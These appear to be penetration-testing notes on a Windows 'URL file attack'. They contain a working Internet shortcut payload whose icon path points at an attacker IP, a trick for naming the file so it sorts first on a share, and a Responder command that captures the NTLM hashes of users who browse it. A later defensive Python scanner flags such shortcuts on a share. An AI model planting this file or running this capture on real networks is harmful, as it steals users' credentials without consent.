
URL File Attacks

Definition

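This is a simple attack to retrieve even more user hashes. The idea is to leave a file on a share whose icon path points to our machine. When a user browses the folder, Windows Explorer tries to load the icon over SMB and authenticates to our machine, so with a tool like Responder we can capture the hash of any user who passes by the share where we dropped it.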

Proof of Concept

URL File Attack

Source

The core of the attack is to create a file with the parameters required to trigger a capture. Here, the icon path of an Internet shortcut (link) file points at the machine running Responder.

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\10.0.0.129\%USERNAME%.icon
IconIndex=1

The idea is to name the file with a leading character that puts it at the top of the target share. When saving from Notepad, we write the name in quotes (“@smthg”) so that the @ is taken into account.


Finally, we open Responder and let it run:

responder -I ens33
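
On the defensive side, a share can be swept for shortcut files like the one above. The following is an added example, not part of the original notes: it parses .url files and flags entries whose path points at a remote host. The function names and both sample files are constructed for illustration.

```python
import configparser
import re
import sys
from pathlib import Path

# [InternetShortcut] keys whose value Explorer may resolve as a path.
PATH_KEYS = ("iconfile", "url", "workingdirectory")
# UNC path (\\host\... or //host/...) or file://host/... URL.
REMOTE = re.compile(r"^(?:[\\/]{2}(?P<unc>[^\\/]+)|file:/{2}(?P<furl>[^/]+))", re.I)

# Constructed samples: the shortcut shown above and a benign one.
SAMPLE = "\n".join([
    "[InternetShortcut]", "URL=blah", "WorkingDirectory=blah",
    r"IconFile=\\10.0.0.129\%USERNAME%.icon", "IconIndex=1",
])
BENIGN = "\n".join([
    "[InternetShortcut]", "URL=https://example.com/",
    r"IconFile=C:\Windows\System32\shell32.dll", "IconIndex=1",
])


def remote_refs(text):
    """Return [(key, host)] for shortcut entries that point at a remote host."""
    parser = configparser.RawConfigParser(strict=False, delimiters=("=",))
    try:
        parser.read_string(text)
    except configparser.Error:
        return []  # not an INI-style shortcut file
    hits = []
    for key in PATH_KEYS:
        value = parser.get("InternetShortcut", key, fallback="").strip()
        match = REMOTE.match(value)
        if match:
            hits.append((key, match.group("unc") or match.group("furl")))
    return hits


def scan_share(root):
    """Walk a share and return {path: hits} for .url files with remote references."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() == ".url" and path.is_file():
            hits = remote_refs(path.read_text(encoding="utf-8-sig", errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    for name, hits in scan_share(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, hits)
```

Internal file servers referenced by legitimate shortcuts will also be reported, so triage the results against the hosts you expect.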
